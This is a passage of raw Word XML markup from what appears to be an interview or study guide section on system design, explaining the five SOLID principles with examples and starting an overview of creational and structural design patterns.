        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B2F6DC" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc178383329"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>System Design/Pattern</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A827855" w14:textId="62D142AC" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc178383330"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain what SOLID principles are</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w14:paraId="2E6AA1EC"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SOLID Principles Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2B266" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Single Responsibility Principle (SRP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D12E0D2"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 class should have only one reason to change, meaning it should have only one responsibility or job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0847DC77"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Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Each class or module should focus on a single task or responsibility. This makes the codebase easier to maintain and less prone to bugs because changes in one part of the system are less likely to impact other parts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E18497"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user management system, instead of having a single User class handling user data, authentication, and email notifications, separate these into classes like UserRepository, Authenticator, and EmailService.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A87A03" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Open/Closed Principle (OCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D80CF"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Software entities (classes, modules, functions, etc.) should be open for extension but closed for modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923561F"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Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: You should be able to add new functionality to a system without modifying existing code. This is often achieved through abstraction (e.g., using interfaces or abstract classes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BABC3B1"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payment processing system, instead of modifying the existing PaymentProcessor class to add new payment methods, create new classes that implement a PaymentMethod interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377F54BD" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Liskov Substitution Principle (LSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE29ED1"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Subtypes must be substitutable for their base types without altering the correctness of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F38EB1"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Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Objects of a derived class should be able to replace objects of the base class without affecting the correctness of the application. This principle ensures that a subclass can stand in for its parent class without causing unexpected behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B6032D"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If you have a base class Bird with a method fly(), and a subclass Penguin that cannot fly, the design would violate LSP. Instead, consider creating separate classes or interfaces for flying and non-flying birds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A4BE40" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interface Segregation Principle (ISP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C235C1E"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Clients should not be forced to depend on interfaces they do not use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4391AD96"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Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Instead of having a single, large interface with many methods, split it into smaller, more specific interfaces. This ensures that implementing classes only need to concern themselves with the methods that are relevant to them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD204B"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If a Worker interface includes methods like assemble() and manage(), it might be better to break it into Assembler and Manager interfaces, so a class that only assembles products doesn’t need to implement manage().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608CBE0D" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dependency Inversion Principle (DIP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1263ECA4"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High-level modules should not depend on low-level modules; both should depend on abstractions. Abstractions should not depend on details; details should depend on abstractions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A02FB"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Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: This principle encourages decoupling by relying on abstractions (interfaces or abstract classes) rather than concrete implementations. It ensures that changes in low-level modules do not affect high-level modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D121E3" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="489"/>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 a notification system, instead of having the UserNotifier class depend directly on a EmailService or SMSService, it should depend on an INotificationService interface. This way, adding a new notification method only requires creating a new implementation of the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770DDEF9"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Benefits of SOLID Principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2FEAAB" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: By adhering to SOLID principles, code becomes easier to maintain because it’s better organized and modular.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4A97D5" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>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 As systems grow, adding new features becomes less risky and more manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AFADEF" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Testability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Code designed according to SOLID principles is easier to unit test because of clear separation of concerns and reduced dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B05E59" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Systems are more adaptable to change, as new features or requirements can be added with minimal impact on existing code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D3E939" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="671144EF" w14:textId="6B530A07" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc178383331"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are design patterns, and why are they important in software development?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w14:paraId="54C2425A" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Design patterns are proven, reusable solutions to common problems that arise during software development. They provide a structured approach to solving recurring design issues, promoting best practices and enhancing the maintainability, scalability, and flexibility of code. Design patterns are like blueprints that can be adapted to fit different contexts within a software project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7866A4"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Types of Design Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1506634B" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Design patterns are generally categorized into three main types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311BF330" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creational Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184D4218" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="491"/>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Deal with object creation mechanisms, trying to create objects in a manner suitable for the situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ED5B66" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="491"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8393D" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensures a class has only one instance and provides a global point of access to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1418A331" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Factory Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Defines an interface for creating an object but lets subclasses alter the type of objects that will be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103953F6" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Builder</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Separates the construction of a complex object from its representation, allowing the same construction process to create different representations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0256D0F3" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Structural Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A9FD1" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="491"/>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Deal with object composition, simplifying the structure of relationships between objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1EED7" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="491"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19649DC0" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Adapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Allows incompatible interfaces to work together by converting the interface of a class into another interface that a client expects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44049AF4" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Decorator</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Adds behavior or responsibilities to an object dynamically without affecting other instances of the same class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB95210" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="491"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Composite</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
